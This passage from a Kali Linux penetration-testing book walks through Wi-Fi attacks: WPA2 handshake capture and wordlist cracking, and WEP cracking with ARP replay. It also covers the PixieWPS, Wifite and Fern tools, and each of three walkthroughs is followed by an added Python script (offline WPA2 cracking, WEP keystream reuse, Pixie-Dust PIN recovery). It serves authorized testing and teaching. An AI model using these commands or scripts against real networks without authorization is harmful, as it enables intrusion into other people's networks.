Table of Contents for
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition


Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition, by Gerard Johansen. Published by Packt Publishing, 2016.
  1. Cover
  2. Table of Contents
  3. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  5. Credits
  6. Disclaimer
  7. About the Authors
  8. About the Reviewer
  9. www.PacktPub.com
  10. Preface
  11. What you need for this book
  12. Who this book is for
  13. Conventions
  14. Reader feedback
  15. Customer support
  16. 1. Beginning with Kali Linux
  17. Kali Linux tool categories
  18. Downloading Kali Linux
  19. Using Kali Linux
  20. Configuring the virtual machine
  21. Updating Kali Linux
  22. Network services in Kali Linux
  23. Installing a vulnerable server
  24. Installing additional weapons
  25. Summary
  26. 2. Penetration Testing Methodology
  27. Vulnerability assessment versus penetration testing
  28. Security testing methodologies
  29. General penetration testing framework
  30. Information gathering
  31. The ethics
  32. Summary
  33. 3. Target Scoping
  34. Preparing the test plan
  35. Profiling test boundaries
  36. Defining business objectives
  37. Project management and scheduling
  38. Summary
  39. 4. Information Gathering
  40. Using public resources
  41. Querying the domain registration information
  42. Analyzing the DNS records
  43. Getting network routing information
  44. Utilizing the search engine
  45. Metagoofil
  46. Accessing leaked information
  47. Summary
  48. 5. Target Discovery
  49. Identifying the target machine
  50. OS fingerprinting
  51. Summary
  52. 6. Enumerating Target
  53. Understanding the TCP/IP protocol
  54. Understanding the TCP and UDP message format
  55. The network scanner
  56. Unicornscan
  57. Zenmap
  58. Amap
  59. SMB enumeration
  60. SNMP enumeration
  61. VPN enumeration
  62. Summary
  63. 7. Vulnerability Mapping
  64. Vulnerability taxonomy
  65. Automated vulnerability scanning
  66. Network vulnerability scanning
  67. Web application analysis
  68. Fuzz analysis
  69. Database assessment tools
  70. Summary
  71. 8. Social Engineering
  72. Attack process
  73. Attack methods
  74. Social Engineering Toolkit
  75. Summary
  76. 9. Target Exploitation
  77. Vulnerability and exploit repositories
  78. Advanced exploitation toolkit
  79. MSFConsole
  80. MSFCLI
  81. Ninja 101 drills
  82. Writing exploit modules
  83. Summary
  84. 10. Privilege Escalation
  85. Password attack tools
  86. Network spoofing tools
  87. Network sniffers
  88. Summary
  89. 11. Maintaining Access
  90. Working with tunneling tools
  91. Creating web backdoors
  92. Summary
  93. 12. Wireless Penetration Testing
  94. Wireless network recon
  95. Wireless testing tools
  96. Post cracking
  97. Sniffing wireless traffic
  98. Summary
  99. 13. Kali Nethunter
  100. Installing Kali Nethunter
  101. Nethunter icons
  102. Nethunter tools
  103. Third-party applications
  104. Wireless attacks
  105. HID attacks
  106. Summary
  107. 14. Documentation and Reporting
  108. Types of reports
  109. The executive report
  110. The management report
  111. The technical report
  112. Network penetration testing report (sample contents)
  113. Preparing your presentation
  114. Post-testing procedures
  115. Summary
  116. A. Supplementary Tools
  117. Web application tools
  118. Network tool
  119. Summary
  120. B. Key Resources
  121. Paid incentive programs
  122. Reverse engineering resources
  123. Penetration testing learning resources
  124. Exploit development learning resources
  125. Penetration testing on a vulnerable environment
  126. Online web application challenges
  127. Virtual machines and ISO images
  128. Network ports
  129. Index

Wireless testing tools

Kali Linux comes prepackaged with a number of command-line and GUI-based wireless tools. They let us put a wireless interface into monitor mode, capture traffic, and recover the network's authentication key from that traffic. The first of these, Aircrack-ng, is a suite rather than a single tool. After it we will look at other tools, both command line and GUI, that cover the full spectrum of tasks involved in wireless penetration testing.

Aircrack-ng

Aircrack-ng is a suite of tools that allows penetration testers to test the security of wireless networks. The suite includes tools for the following tasks:

  • Monitoring: Tools designed to capture 802.11 traffic for later analysis. We will see below how the suite captures wireless traffic into files that third-party software such as Wireshark can examine.
  • Attacking: Tools for attacking target networks, including de-authentication and replay attacks. These rely on Aircrack-ng's packet injection capability: the suite itself sends forged frames to clients and to the access point as part of the attack, which requires a wireless card and driver that support injection.
  • Testing: Tools for checking the wireless capability of hardware, for example whether a wireless card supports injection.
  • Cracking: Tools that recover WEP keys and WPA/WPA2 Pre-shared Keys from captured traffic.

In addition to the command-line tools, a number of GUI-based tools are built on top of Aircrack-ng. A solid understanding of how Aircrack-ng works therefore provides the foundation for the other tools we will explore later in this chapter.

WPA Pre-shared Key cracking

Now we will use the Aircrack-ng suite against a WPA2 wireless network. The process involves identifying the target network, capturing the four-way handshake, and then running a wordlist against the capture to recover the passphrase. The passphrase is not used directly: the client and the access point derive the Pre-shared Key from the passphrase and the network's SSID (PBKDF2-HMAC-SHA1 with 4,096 iterations), and the handshake carries a message integrity code computed from that key, so each candidate passphrase can be checked offline against the capture. Once the passphrase is recovered, we can authenticate to the target network:

  1. The first step is to ensure that the wireless network card is inserted and working properly. For this, enter the following command:
    # iwconfig
    

    The output lists each interface that has wireless extensions. If the wireless interface does not appear, check that the card is recognized and its driver is loaded before continuing.

    In the book's run the wireless interface is wlan0. If you have more than one interface, you may see wlan1 as well. Be sure you are using the correct interface throughout these tests.

  2. The first tool we will use in the Aircrack-ng suite is airmon-ng. It switches the wireless card into monitor mode. This is similar in spirit to putting a wired interface into promiscuous mode, but goes further: in monitor mode the card passes up every 802.11 frame it hears on the channel, including management frames such as beacons, authentication and de-authentication, without being associated to any network. To see the options available in airmon-ng, type the following:
    # airmon-ng -h
    

    To switch the wireless card to monitor mode, we type the following:

    # airmon-ng start wlan0
    

    If successful, airmon-ng reports the new monitor interface. Checking the interfaces again with iwconfig shows that a monitor-mode interface, wlan0mon, now exists; this is the interface name the rest of the commands use.

    Sometimes there are processes that interfere with putting the wireless card into monitor mode. When you execute airmon-ng start wlan0, you may see a warning listing processes that could cause trouble; typically these are NetworkManager, dhclient and wpa_supplicant, which reconfigure the card behind airmon-ng's back. To list them without touching them, run:

    # airmon-ng check
    

    To have airmon-ng kill them for you, run:

    # airmon-ng check kill
    

    Alternatively, kill the two offending processes yourself:

    # pkill dhclient
    # pkill wpa_supplicant
    

    This kills the processes that interfere with airmon-ng. Once you are done with the Aircrack-ng tools, take the card out of monitor mode and restart the services:

    # airmon-ng stop wlan0mon
    # service networking start
    # service network-manager start
    

    If there are still any issues, restart Kali Linux and these services will be re-enabled.

  3. Next, we need to scan for our target network. In the previous section, we discussed some of the reconnaissance necessary to identify potential target networks. Here we will use airodump-ng to find the target, its BSSID and the channel it is broadcasting on. To see the options for airodump-ng, type the following:
    # airodump-ng --help
    

    Now we use airodump-ng on the monitor interface to list nearby networks:

    # airodump-ng wlan0mon
    

    Airodump-ng hops across channels and keeps running as long as you let it, listing access points in the upper table and associated stations in the lower one. Once you see the target network, press Ctrl + C to stop. In the book's run, the target network is the row highlighted in red in the listing.
  4. The previous step has identified three key pieces of information. First, our target network, Aircrack_Wifi. Second, its BSSID, which is the MAC address of the access point, 44:94:FC:37:10:6E. Finally, the channel number, 6. The next stage is to capture wireless traffic to and from the target access point; our goal is the four-way handshake. To start capturing traffic, type the following:
    # airodump-ng -c 6 --bssid 44:94:FC:37:10:6E -w wificrack wlan0mon
    

    This tells airodump-ng to lock the monitor interface onto channel 6, capture only frames involving our target's BSSID, and write them to files prefixed wificrack. Locking the channel matters: if airodump-ng keeps hopping it can miss part of the handshake, and aircrack-ng needs the messages that carry both nonces and the MIC to test candidates.

    As the command runs, we want to ensure that we capture the handshake. When a client completes a valid handshake, airodump-ng reports "WPA handshake: 44:94:FC:37:10:6E" in the top-right corner of its output.

    If you are not able to obtain the WPA handshake, look for a client already using the network. In the book's run, a station with the MAC address 64:A5:C3:DA:30:DC is attached to the target. Because this device has already authenticated, it will most likely reconnect automatically if its connection is temporarily lost, so in a second terminal we type:

    # aireplay-ng -0 3 -a 44:94:FC:37:10:6E -c 64:A5:C3:DA:30:DC wlan0mon
    

    The aireplay-ng command injects packets into the communication stream. Here -0 3 sends three bursts of de-authentication frames, -a names the access point and -c the client to de-authenticate. The client is forced to complete a new WPA handshake, which airodump-ng captures. Note that this does not work against a network that enforces Protected Management Frames (802.11w), because the client then discards unauthenticated de-authentication frames; on such networks you have to wait for a client to connect on its own.

  5. After we have captured the handshake, we stop airodump-ng with Ctrl + C. Listing the working directory shows four files created by the dump: wificrack-01.cap, the raw capture, plus wificrack-01.csv, wificrack-01.kismet.csv and wificrack-01.kismet.netxml, which summarize the networks and clients seen.

    We can examine wificrack-01.cap in Wireshark. Applying the display filter eapol shows the four EAPOL-Key frames of the handshake we captured.

    Expanding one of these frames shows the specific WPA key Nonce and associated information: the ANonce and SNonce, the replay counter, and the MIC that aircrack-ng will test candidate passphrases against.
  6. Now that we have the captured handshake, we have what is needed to attempt to recover the WPA Pre-shared Key. To do this, we use aircrack-ng:
    # aircrack-ng -w rockyou.txt -b 44:94:FC:37:10:6E wificrack-01.cap
    

    In the preceding command, -b identifies the target network's BSSID, so aircrack-ng ignores any other handshakes in the file. We then point to the capture file, wificrack-01.cap. Finally, -w supplies a wordlist, used much as we would when cracking a password file; here, rockyou.txt. (Kali ships it compressed as /usr/share/wordlists/rockyou.txt.gz; decompress it with gunzip first.) Hit Enter and aircrack-ng starts working.
  7. Aircrack-ng tries every entry in rockyou.txt against the capture file. If the passphrase is in the file, aircrack-ng reports "KEY FOUND!" together with the passphrase.

    In the book's run, the passphrase "15SHOUTINGspiders" was in rockyou.txt. Note that this took approximately 1 hour and 42 minutes and tried a total of 8,623,648 candidates: each candidate costs a 4,096-iteration PBKDF2 derivation before the MIC can be checked, which is what makes WPA cracking so much slower than cracking a plain password hash on a CPU, and why GPU-based crackers are used on the same capture when speed matters. This technique works with any wordlist, as discussed in the password-cracking chapter. Just remember that a WPA passphrase can be anywhere from 8 to 63 characters long, so exhaustive search is hopeless; the attack succeeds against short or easy-to-remember passphrases, in much the same way password cracking does.
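What aircrack-ng does for each candidate passphrase, as an added example in Python that is not code from the book or from the Aircrack-ng project. It derives the PMK from passphrase and SSID, the KCK from the PMK, the two MAC addresses and the two nonces, and recomputes the MIC of handshake message 2, so the cost per candidate and the role of the SSID are visible. It does not read a .cap file: the nonces, the EAPOL frame and the wordlist are constructed in the script, and the client side of the handshake is simulated with the true passphrase. The SSID, BSSID, station MAC and passphrase are the values quoted in the steps above.

```python
"""Offline WPA2-PSK dictionary attack against a four-way handshake.

Added example (not code from the book or from the Aircrack-ng project). It
re-implements what aircrack-ng does for every candidate passphrase. The SSID,
BSSID, station MAC and recovered passphrase are the values quoted in the
book's walkthrough; the nonces, the EAPOL frame and the wordlist are
constructed here and were not captured from any network.
"""
import hashlib
import hmac
import struct

SSID = b"Aircrack_Wifi"                   # ESSID from the book's airodump-ng listing
AP_MAC = bytes.fromhex("4494FC37106E")    # BSSID quoted in the book
STA_MAC = bytes.fromhex("64A5C3DA30DC")   # station MAC quoted in the book
# Constructed nonces (a real ANonce/SNonce is 32 random bytes chosen by each side)
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    The SSID is the salt: the same passphrase on a differently named network
    yields a different PMK, which is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_kck(pmk: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK: the Key Confirmation Key that signs EAPOL frames."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)   # PTK-384 for CCMP
    return ptk[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (802.1X header + RSN key descriptor)."""
    key_info = 0x010A   # descriptor version 2 (HMAC-SHA1), pairwise, MIC present
    body = struct.pack("!BHH8s32s16s8s8s16sH", 2, key_info, 16, b"\x00" * 8,
                       snonce, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack("!BBH", 2, 3, len(body)) + body   # version 2, type EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap, sta, anonce, snonce, frame, wordlist):
    """Try each candidate passphrase; the one that reproduces the frame's MIC wins."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap, sta, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate.decode()
    return None


def simulate_capture(passphrase: bytes) -> bytes:
    """Stand-in for the client in the capture: signs message 2 with the real PSK."""
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned))


TRUE_PASSPHRASE = b"15SHOUTINGspiders"      # the passphrase recovered in the book's run
CAPTURED_FRAME = simulate_capture(TRUE_PASSPHRASE)
# Constructed stand-in for rockyou.txt
WORDLIST = [b"password", b"letmein", b"Aircrack_Wifi", b"15SHOUTINGspiders", b"qwerty123"]


def run_demo():
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_FRAME, WORDLIST)


if __name__ == "__main__":
    print("KEY FOUND:", run_demo())
```

Running the script prints the recovered passphrase. The PBKDF2 step dominates: 4,096 HMAC-SHA1 rounds per candidate, with nothing reusable between candidates, which is why a wordlist of several million entries takes hours on a CPU while the MIC check itself is trivial.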

WEP cracking

The process for WEP cracking is very similar to the one used for WPA: identify the target network, capture traffic, and then run aircrack-ng against the capture to recover the key. There are some differences, though. With WPA, all we had to capture was the four-way handshake. WEP encrypts each frame with RC4 keyed by the shared key prefixed with a 24-bit Initialization Vector (IV) that is sent in the clear, and aircrack-ng's statistical attack recovers the key from a large number of frames with distinct IVs rather than from a single exchange. So in WEP cracking we have to make sure we gather enough IVs, and on a quiet network that can take a long time. Fortunately, techniques are available to make the access point generate traffic on demand, keeping the sniffing time as short as possible:

  1. To start cracking WEP, put the wireless card into monitor mode just as for WPA cracking:
    # airmon-ng start wlan0
    
  2. We then look for our target network using the following command:
    # airodump-ng wlan0mon
    

    This produces the list of wireless networks. In the book's run, the listing shows a target network running WEP with the BSSID C0:56:27:DB:30:41. As before, we need to note the BSSID as well as the channel the access point is using, in this case channel 11.

  3. Next, we capture the data on our target wireless network, again with airodump-ng:
    # airodump-ng -c 11 -w belkincrack --bssid C0:56:27:DB:30:41 wlan0mon
    

    This points airodump-ng at our target network on its channel and writes the captured traffic to files prefixed belkincrack. The #Data column of its output counts the data frames, and therefore the IVs, collected so far.

    Note

    At this point we do not yet see any data moving across the access point. This matters, because only data frames carry the IVs that we need to crack the WEP key; beacons and other management frames are not encrypted and contribute nothing.

  4. Next, we fake an authentication to the target network. We use aireplay-ng to tell the access point that we are a station ready to associate. WEP's open-system authentication does not require proof of the key, so even without it the following command lets us associate with the WEP access point, which is a precondition for the access point to accept the frames we inject later. Enter the following command:
    # aireplay-ng -1 0 -a C0:56:27:DB:30:41 wlan0mon
    

    In the preceding command, -1 selects the fake authentication attack, 0 is the re-association delay in seconds (0 means authenticate once and stop), and -a is the BSSID of the target access point. If it succeeds, aireplay-ng reports "Association successful :-)". (If the access point uses WEP shared-key authentication instead of open authentication, this simple fake authentication fails, because the access point challenges the station to encrypt a value with the key.)

    We are now associated with the WEP access point and can inject frames that it will accept.

  5. As we saw in step 3, there was very little data moving through the access point. We need a large number of frames with distinct IVs, and we can use aireplay-ng to make the access point generate them. In the following command we conduct an ARP Request Replay Attack: aireplay-ng listens for an ARP request from a legitimate client, then retransmits it to the access point over and over. An ARP request is small, has a fixed and predictable content, and is accepted as many times as it is sent; each time the access point relays it, it encrypts the frame with a fresh IV, so the IV count climbs rapidly. Open a second terminal and type the following:
    # aireplay-ng -3 -b C0:56:27:DB:30:41 wlan0mon
    

    In the preceding command, -3 selects the ARP Request Replay Attack, -b names the target access point, and wlan0mon is the monitor interface to inject on. The attack does not start until a genuine ARP request appears on the network, so it will sit at "Read N packets (got 0 ARP requests ...)" until one does; pinging another host on the same network from a legitimate client is one way to trigger one. Once it is running, aireplay-ng reports the growing count of ARP requests read and sent.

    If we return to the first terminal, where airodump-ng is running, we see the #Data counter start climbing; in the book's run it passes 16,000 IVs.
  6. Open a third terminal and start the WEP cracking. This can run while airodump-ng is still capturing IVs, because aircrack-ng re-reads the growing file. To start the process, type the following:
    # aircrack-ng belkincrack-01.cap
    

    Here we simply point aircrack-ng at the capture file that is still being written. It starts working immediately.

    Aircrack-ng may report that there are not enough IVs and that it will retry when more have been captured, re-reading the file every few thousand IVs. In the book's run, aircrack-ng determined the WEP key once 15,277 IVs had been captured, after testing 73,253 candidate keys in less than three minutes.

    As this attack shows, with enough wireless traffic and the Aircrack-ng suite we can recover the WEP key and authenticate to the network. The ease of this attack is what drove the move from WEP to WPA. WEP networks are becoming rare in the wild because of it, but you may still see some; if you do, this attack is an excellent way to demonstrate to clients the significant security weakness present.
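Why collecting IVs works, as an added example in Python that is not code from the book or from the Aircrack-ng project. It builds WEP frames the way an access point does (RC4 keyed with IV || key, CRC-32 integrity value appended) and shows the consequence of the 24-bit IV space: a frame with known plaintext, such as the ARP request that the replay attack feeds back to the access point, yields that IV's keystream, which then decrypts any other frame sent under the same IV with no knowledge of the key. Aircrack-ng's own key recovery (the PTW and Korek statistical attacks) is not implemented here. The WEP key, the IVs and the frame contents are constructed for the demo.

```python
"""Why WEP traffic is crackable: RC4 keystream reuse across frames.

Added example (not code from the book or the Aircrack-ng project). It builds
WEP frames as an access point does and shows what an attacker obtains once a
frame's plaintext is known or two frames share an IV. The key, IVs and
payloads are constructed for the demo.
"""
import os
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP body: IV (3 bytes) || key id byte || RC4_{IV||key}(payload || ICV)."""
    icv = zlib.crc32(payload).to_bytes(4, "little")   # WEP's CRC-32 integrity value
    keystream = rc4(iv + key, len(payload) + 4)
    return iv + b"\x00" + xor(payload + icv, keystream)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("bad ICV")
    return payload


# Constructed 40-bit WEP key (64-bit WEP = 24-bit IV + 40-bit key)
WEP_KEY = bytes.fromhex("0BADC0FFEE")
# A complete ARP request as it appears inside a WEP frame: LLC/SNAP header plus
# the 28-byte ARP body. Addresses are constructed; the structure is the real one.
KNOWN_ARP_REQUEST = (
    bytes.fromhex("AAAA030000000806")                          # LLC/SNAP, EtherType ARP
    + bytes.fromhex("0001080006040001")                        # Ethernet/IPv4, opcode request
    + bytes.fromhex("001122334455") + bytes([192, 168, 1, 10])  # sender MAC / IP
    + bytes(6) + bytes([192, 168, 1, 1])                       # target MAC (unknown) / IP
)


def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """Attacker step: ciphertext XOR known plaintext = keystream for that IV."""
    return xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_with_reused_iv(known_frame: bytes, known_plaintext: bytes, other_frame: bytes) -> bytes:
    """Decrypt the prefix of any other frame sent under the same IV, without the key."""
    if known_frame[:3] != other_frame[:3]:
        raise ValueError("IVs differ; keystreams are unrelated")
    ks = keystream_from_known_plaintext(known_frame, known_plaintext)
    return xor(other_frame[4:4 + len(ks)], ks)


def iv_reuse_demo() -> bytes:
    """An ARP request and an IP frame encrypted under the same IV (constructed)."""
    iv = bytes.fromhex("0C1D2E")
    arp_frame = wep_encrypt(WEP_KEY, iv, KNOWN_ARP_REQUEST)
    secret = bytes.fromhex("AAAA030000000800") + b"GET /login"   # IP frame, same IV
    secret_frame = wep_encrypt(WEP_KEY, iv, secret)
    return decrypt_with_reused_iv(arp_frame, KNOWN_ARP_REQUEST, secret_frame)


def frames_until_iv_repeat(sample: int = 40000) -> int:
    """How many randomly chosen 24-bit IVs are sent before the first repeat (birthday bound,
    typically a few thousand). Cards that count IVs up from zero after reboot do worse."""
    seen = set()
    for n in range(1, sample + 1):
        iv = os.urandom(3)
        if iv in seen:
            return n
        seen.add(iv)
    return 0
```

The recovered keystream is exactly as long as the known plaintext, which is why a replayed ARP request (36 bytes of known content) is enough to read the start of every other frame under that IV, and why the replay attack's output is measured in IVs rather than in bytes.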

PixieWPS

PixieWPS is an offline attack tool that recovers the PIN of a wireless access point that has WPS (Wi-Fi Protected Setup) enabled. Its name comes from the Pixie-Dust attack discovered by Dominique Bongard. WPS proves knowledge of the eight-digit PIN in two halves, using hashes (E-Hash1 and E-Hash2) that mix each half with two secret nonces, E-S1 and E-S2, chosen by the access point. Bongard found that several access point implementations generate those nonces predictably (for example, as all zeros, or from a weak pseudo-random generator), so that once the hashes and public keys from a single WPS exchange have been captured, the PIN can be brute forced entirely offline: at most 10,000 candidates for the first half and 1,000 for the second, instead of online guesses rate-limited by the access point. (For more detailed information on this vulnerability, see Bongard's presentation here: https://passwordscon.org/wp-content/uploads/2014/08/Dominique_Bongard.pdf.)

To access PixieWPS, type the following into the command prompt:

# pixiewps

The command prints the available options. For PixieWPS to work, a good deal of information must be obtained from a single WPS registration exchange with the access point. This includes the following:

  • Enrollee public key (PKE)
  • Registrar public key (PKR)
  • Enrollee Hash-1 (E-Hash1)
  • Enrollee Hash-2 (E-Hash2)
  • Authentication session key (AuthKey)
  • Enrollee nonce (E-Nonce)

Because all of these components have to be pulled out of a live WPS exchange, PixieWPS is usually run from another tool that performs the exchange and passes them along, such as Reaver or Wifite.
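The Pixie-Dust computation itself, as an added example in Python that is not code from the book, PixieWPS or Reaver. The hash construction is the one WPS defines: PSK1 and PSK2 are the first 128 bits of HMAC-SHA256 over each half of the PIN under AuthKey, and E-Hash1 and E-Hash2 are HMAC-SHA256 over E-S1 || PSK1 || PKE || PKR and E-S2 || PSK2 || PKE || PKR. The script simulates an access point whose E-S1 and E-S2 are all zeros, one of the weak-nonce cases Bongard described, and recovers its PIN offline from the hashes it sends in M3; with unpredictable nonces the same search fails. AuthKey, PKE, PKR and the PIN are constructed stand-ins.

```python
"""Offline WPS PIN recovery in the Pixie-Dust all-zero-nonce case.

Added example (not code from the book, PixieWPS or Reaver). AuthKey, PKE, PKR
and the PIN are constructed; real PKE/PKR are 192-byte Diffie-Hellman public
keys and AuthKey is derived from the resulting shared secret.
"""
import hashlib
import hmac


def wps_pin_checksum(first7: str) -> int:
    """Eighth PIN digit: weights 3,1,3,1,3,1,3 over the first seven digits."""
    accum = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - accum % 10) % 10


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, four ASCII PIN digits)."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(authkey, pke, pkr, pin: str, e_s1: bytes, e_s2: bytes):
    """What a WPS access point sends in M3: the two hashes committing to its PIN."""
    return (e_hash(authkey, e_s1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, e_s2, psk_half(authkey, pin[4:]), pke, pkr))


def pixie_dust_zero_nonces(authkey, pke, pkr, ehash1, ehash2):
    """Recover the PIN offline assuming E-S1 = E-S2 = 0.

    Because WPS commits to the PIN in two halves and the last digit is a
    checksum, this costs at most 10,000 + 1,000 HMACs instead of 10^7."""
    zero = b"\x00" * 16
    tries = 0
    first = None
    for i in range(10_000):
        tries += 1
        cand = f"{i:04d}"
        if e_hash(authkey, zero, psk_half(authkey, cand), pke, pkr) == ehash1:
            first = cand
            break
    if first is None:
        return None, tries
    for j in range(1_000):
        tries += 1
        second = f"{j:03d}"
        second += str(wps_pin_checksum(first + second))
        if e_hash(authkey, zero, psk_half(authkey, second), pke, pkr) == ehash2:
            return first + second, tries
    return None, tries


# Constructed values standing in for the M1/M2 fields PixieWPS needs.
AUTHKEY = hashlib.sha256(b"constructed authkey").digest()
PKE = hashlib.sha256(b"constructed PKE").digest() * 6   # 192 bytes, like a real PKE
PKR = hashlib.sha256(b"constructed PKR").digest() * 6
TRUE_PIN = "12345670"   # a valid PIN: 1234567 plus its checksum digit 0
ZERO_NONCE = b"\x00" * 16
# Unpredictable nonces (constructed here) stand for a correctly implemented access point
RANDOM_ES1 = hashlib.sha256(b"constructed E-S1").digest()[:16]
RANDOM_ES2 = hashlib.sha256(b"constructed E-S2").digest()[:16]


def run_demo(e_s1: bytes = ZERO_NONCE, e_s2: bytes = ZERO_NONCE):
    """Capture M3 from the simulated access point, then attack it offline."""
    ehash1, ehash2 = enrollee_m3(AUTHKEY, PKE, PKR, TRUE_PIN, e_s1, e_s2)
    return pixie_dust_zero_nonces(AUTHKEY, PKE, PKR, ehash1, ehash2)


if __name__ == "__main__":
    print("zero nonces:", run_demo())
    print("random nonces:", run_demo(RANDOM_ES1, RANDOM_ES2))
```

The first call recovers the PIN after roughly 1,800 HMAC computations; the second exhausts all 10,000 first-half candidates and gives up, which is the behaviour a non-vulnerable access point produces. Other weak-nonce cases in Bongard's talk differ only in how E-S1 and E-S2 are reconstructed (from E-Nonce and a weak generator) before the same search is run.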

Wifite

Wifite is an automated wireless penetration-testing tool that drives the Aircrack-ng suite together with the command-line tools Reaver and PixieWPS. This lets Wifite capture traffic and recover the authentication credentials of WEP-, WPA- and WPS-type wireless networks. Wifite can be started by navigating to Applications | Wireless Attacks | Wifite or from the command line:

# wifite

Either brings you to the initial screen.

Wifite automatically puts the wireless card into monitor mode and then starts scanning for wireless networks, listing each with a number, its ESSID, channel, encryption type, signal strength, whether WPS is enabled and whether clients are attached.

Once you see the target network in the list, in this case the ESSID or broadcast SSID "Brenner", hit Ctrl + C. You will then be prompted to enter either a single number or a range of targets. In this case, we enter the number 4 and hit Enter.

Wifite automatically starts with the WPS Pixie-Dust attack, running the WPS exchange to collect the values PixieWPS needs and then handing them to it.

If the WPS vulnerability is present, as it was for the wireless network here, Wifite recovers both the WPS PIN and, from it, the WPA key, and displays them.

Fern Wifi Cracker

The Fern Wifi Cracker is a GUI-based tool written in Python for testing the security of wireless networks. There are currently two versions: a paid, professional version with a great deal more functionality, and a free version with limited functionality. The version included with Kali Linux requires Aircrack-ng and other wireless tools to function properly.

To start Fern, you can navigate to the Applications | Wireless Attacks | Fern Wifi Cracker, or type the following into the command prompt:

# fern-wifi-cracker

Fern opens on its main window.

We will use Fern Wifi Cracker to attack the same wireless network, Aircrack_Wifi, using the GUI instead of the command line:

  1. The first step is to select our interface. Click on the drop-down menu Select Interface; in this case, we select wlan0. Fern automatically places the interface into monitor mode for us.
  2. Next, click on the button Scan for Access Points. Fern scans for wireless networks within range of your antenna. When the scan completes, the Wifi WEP and WiFi WPA buttons change from grayed-out to colored, indicating that access points using those security settings have been detected.
  3. Clicking on the Wifi WPA button opens an attack panel with a graphical representation of the WPA access points that we can attack. In this case, we select the button for Aircrack_Wifi.
  4. The next screen provides details about the selected access point. Fern Wifi Cracker offers either a WPA attack or a WPS attack; in this case, we stay with the WPA attack.
  5. The only other step necessary is to set the passphrase file that Fern Wifi Cracker will use. In this case, we have crafted a special Wi-Fi passphrase list and point Fern Wifi Cracker to that text file.
  6. Once the passphrase file is set, click on the Wifi Attack button. Fern Wifi Cracker completes the entire process we covered in the Aircrack-ng section: it de-authenticates a client, captures the four-way handshake, and then works through the passphrase file. If the passphrase is in the file, Fern displays it as the recovered WPA key.

Fern Wifi Cracker takes care of the back-end work of cracking Wi-Fi networks and access points. While it may seem easier to use this tool, it is best to have a solid understanding of how Aircrack-ng works. Fern Wifi Cracker and other GUI-based Wi-Fi cracking programs are built around Aircrack-ng, and knowing that toolset will let you understand what is happening behind the scenes in programs such as this.